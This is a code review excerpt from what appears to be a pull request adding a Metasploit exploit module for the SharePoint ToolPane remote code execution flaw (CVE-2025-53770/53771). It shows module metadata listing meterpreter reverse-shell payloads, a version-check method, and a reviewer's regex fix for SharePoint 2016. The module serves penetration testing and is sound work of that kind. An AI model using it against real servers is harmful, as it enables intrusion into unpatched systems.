modules/exploits/windows/http/sharepoint_toolpane_rce.rb

```diff
@@ -0,0 +1,312 @@
+          # Microsoft advisories for CVE-2025-53770 and CVE-2025-53771, caught in-the-wild.
+          ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53770'],
+          ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53771'],
+          # Microsoft Guidance.
+          ['URL', 'https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/'],
+          # The zero-day exploit for CVE-2025-53770 and CVE-2025-53771, published July 21, 2025.
+          ['URL', 'https://gist.github.com/gboddin/6374c04f84b58cef050f5f4ecf43d501'],
+          # Markus Wulftange (CODE WHITE GmbH) reproduced CVE-2025-49704 and CVE-2025-49706, circa July 14, 2025.
+          ['URL', 'https://x.com/codewhitesec/status/1944743478350557232'],
+          # Dinh Ho Anh Khoa (Viettel Cyber Security) demoed CVE-2025-49704 and CVE-2025-49706 at Pwn2Own Berlin on May 16, 2025.
+          ['URL', 'https://x.com/thezdi/status/1923317597673533552'],
+          # Prior work from Steven Seeley on a similar DataSet gadget chain for SharePoint.
+          ['URL', 'https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html']
+        ],
+        'DisclosureDate' => '2025-07-19', # Disclosure date for CVE-2025-53770 and CVE-2025-53771.
+        'Platform' => ['win'],
+        'Arch' => [ARCH_CMD],
+        'Privileged' => false, # Executes as the SharePoint site user.
+        'Targets' => [
+          [
+            'Default', {}
+          ]
+        ],
+        # NOTE: Tested with the following payloads:
+        #   cmd/windows/http/x64/meterpreter/reverse_tcp
+        #   cmd/windows/generic
+        'DefaultOptions' => {
+          'RPORT' => 80,
+          'SSL' => false,
+          # Delete the fetch binary after execution.
+          'FETCH_DELETE' => true,
+          # The root path of the SharePoint site
+          'URIPATH' => '/'
+        },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '_layouts', '15', 'error.aspx')
+    )
+
+    return CheckCode::Unknown('Connection failed') unless res
+
+    return CheckCode::Unknown("Unexpected response code #{res.code}") unless res.code == 200
+
+    # The returned HTML will have a blob of JavaScript that contains a hash object called _spPageContextInfo. A key
+    # called siteClientTag will have a value of the current SharePoint Server patch level. We cannot rely on the HTTP
+    # header value MicrosoftSharePointTeamServices as this may not reflect the actual patch level.
+    site_client_tag = res.body.match(/"siteClientTag"\s*:\s*"\d*[$]+([^"]+)",/)
```

Comment:
```suggestion
    site_client_tag = res.body.match(/"*siteClientTag"*\s*:\s*"\d*[$]+([^"]+)",/)
```
```suggestion
    site_client_tag = res.body.match(/(?:"siteClientTag"|siteClientTag)\s*:\s*"\d*[$]+([^"]+)",/)
```
It seems that the double quotes don't exist in the 2016 version:

`[...]updateFormDigestPageLoaded: new Date("2025-07-24T01:05:38.0691870Z"), siteClientTag: "0$$16.0.4615.1000", crossDomainPhotosEnabled:false, webUIVersion[...]`